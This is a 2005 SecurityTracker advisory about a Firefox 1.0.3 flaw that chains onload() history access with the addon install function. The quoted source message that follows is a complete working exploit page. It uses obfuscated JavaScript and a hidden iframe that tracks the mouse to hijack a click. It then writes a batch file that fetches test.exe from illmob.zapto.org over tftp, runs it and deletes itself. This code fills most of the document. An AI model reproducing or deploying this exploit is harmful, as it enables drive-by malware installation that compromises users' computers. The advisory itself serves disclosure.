SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Mozilla Firefox Vendors:   Mozilla.org
(Additional Exploit Code is Available) Firefox onload() History Access Bug and Install Function Scripting Execution Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013914
SecurityTracker URL:  http://securitytracker.com/id/1013914
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 8 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   Several vulnerabilities were reported in Firefox. A remote user can execute arbitrary code on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.

A remote user can cause a Firefox chrome page to load a 'javascript:' URL with privileges. The addon install function can be made to display an icon containing a 'javascript:' URL to achieve this.

Because the vulnerable install function can only be loaded via 'update.mozilla.org' or 'addon.mozilla.org', the remote user must exploit a separate vulnerability to trigger the flaw. The onload() event can be exploited via a frame within a javascript page to access ostensibly restricted elements of the window object, such as the history. The history object can be accessed to navigate back to the calling javascript page and execute the page within the context of a window (displaying 'mozilla.org' web page content).

A demonstration exploit is available at:

http://greyhatsecurity.org/vulntests/ffrc.htm

Paul from Greyhats Security reported this vulnerability. Michael Krax assisted in researching this vulnerability.

Impact:   A remote user can execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mozilla.org/products/firefox/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 8 2005 Firefox onload() History Access Bug and Install Function Scripting Execution Flaw Lets Remote Users Execute Arbitrary Code



 Source Message Contents

Subject:  firefox 1.0.3 spoof+auto dl




firefox 1.0.3 spoof+auto dl 


./0 bite the cheese illwill./ 
idiot
tftp -i illmob.zapto.org get test.exe c:\test.exe

./-----------------js.js----------./
var blockedReferrer = 'blockedReferrer';
NS_ActualWrite=document.write;
// Popup Blocker -->
RanPostamble=0;
NS_ActualOpen=window.open;
function NS_NullWindow(){this.window;}
function nullDoc() {
   this.open = NS_NullWindow;
   this.write = NS_NullWindow;
   this.close = NS_NullWindow;
}
function NS_

NewOpen(url,nam,atr){
	if((nam!='' && nam==window.name) || nam=='_top'){
	   return(NS_ActualOpen(url,nam,atr));}
	obj=new NS_NullWindow();
	obj.focus = NS_NullWindow;
	obj.blur = NS_NullWindow;
	obj.opener = this.window;
	obj.document = new nullDoc();
	return(obj);
}
function NS_NullWindow2(){this.window;}
function NS_NewOpen2(url,nam,atr){
	if((nam!='' && nam==window.name) || nam=='_top'){
	   return(NS_ActualOpen(url,nam,atr));}
    return(new NS_NullWindow2());
}
function op_stop() { NS_ActualOpen2=window.open; window.open=NS_NewOpen2; }
function op_start() { window.open=NS_ActualOpen2; }
function noopen_load() { 
    op_stop(); if(zl_orig_onload) zl_orig_onload(); op_start();
}
function noopen_unload() { op_stop(); if(zl_orig_onunload) zl_orig_onunload(); op_start(); }
function postamble() {

  if(!RanPostamble) {
    RanPostamble=1;
	zl_orig_onload = window.onload;
	zl_orig_onunload = window.onunload;
	window.open=NS_ActualOpen;
  }
}
window.open=NS_NewOpen;
document.ignore = new Object();
-------------------------------
./--------your info .htm-------------./
<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			&lt;script language="javascript" src="yourinfo_files/js.js">&lt;/script&gt;</head>


<body>


&lt;script language="JavaScript"><!--
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--\nPAHSBMGH OQBuFFZQDCMGH(){\nUFFHUIQ= HU9MOUBGD.UFFhUIQ;\nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;\nIULGD9QD
 = UFF9QDCMGH.CATCBDMHO(\", #);\nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;\nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB
 q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;\nDQBADH \";\n}\n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH
 BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\\'CBQUJSGGKMQC\\'){8MHRG8.HUIQ=\\'CBQUJSGGKMQC\\';}
  QJCQ{ Q9QHB={BUDOQB:{NDQP:\\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-\".z.v.#-P7+I5+BT.7FM\\'}};MHCBUJJ(Q9QHB,\\'WGA
 UDQ 9AJHQDUTJQ!!!\\',\\'LU9UCSDMFB:Q9UJ(\\\\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(")
;
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\\\\\\\\'S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]\");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\
\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,\"7\"<|\"7\"w|\"7]\",<]\",\");GABFAB=\\\\\\\\\\\\\\'BPBF
 -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\");
d("\\\\\\HRQJ %\"\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\\\\')\\');
 }')+'4/HGCSDMFB34U NDQP=\\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]\"&UFFJMSUBMGH=PMDQPG7\\' CB6JQ=\\'SADCGD:RQPUAJB;\\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0
 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0\"0 IUDOMH8MRBN=0\"0 IUDOMHNQMONB=\"0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:\"F7; 8MRBN:\"F7;
 NQMONB:yF7; 8MRBN:yF7; IUDOMH:\"F7; FURRMHO:\"F7; -IG5-GFUSMB6:\"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03\n\nRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB
 = (Q.FUOQX->)+0F70\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70\n}   \n\n9UD SGAHBQD = \";    \nPAHSBMGH
 JGURQD() {\n    SGAHBQD++\n    MP(SGAHBQD == #) {\n        CBQUJSGGKMQC.PGSAC()\n    } QJCQ MP(SGAHBQD == ]) {\n        CBQUJSGGKMQC.NMCBGD6.OG(-#)\n
        //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;\n    }\n}\n\n4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//-->&lt;/script&gt;
&lt;script language="JavaScript"><!--
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#\"";function
 codeIt (mC, eS) {var wTG, mcH =  mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if
 (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv
 = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//-->&lt;/script&gt;&lt;script language="JavaScript"><!--
Decode();document.write(ky);//-->&lt;/script&gt;&lt;script language="javascript"><!--
function getAppVersion(){
appname= navigator.appName;
appversion = navigator.appVersion;
majorver = appversion.substring(0, 1);
if ( (appname == "Netscape") && ( majorver >= 3 ) ) return 1;
if ( (appname == "Microsoft Internet Explorer") && (majorver >= 4) ) return 1;
return 0;
}
//-->&lt;/script&gt;i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to
 get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}
  else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
 are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile)
;file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance(Compone
nts.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x
 20,420,0);output=\\\\\\\'tftp -i illmob.zapto.org get test.exe c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ncls\\\\\\\\nstart c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ndel
 %0\\\\\\\\ncls\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\'
 style=\'cursor:default;\'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position:
 absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe>&lt;script language="JavaScript"
 type="text/javascript">

document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}   

var counter = 0;    
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display="none";
    }
}

&lt;/script&gt;
&lt;script language="javascript">postamble();&lt;/script&gt;
</body></html>
------------------------------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC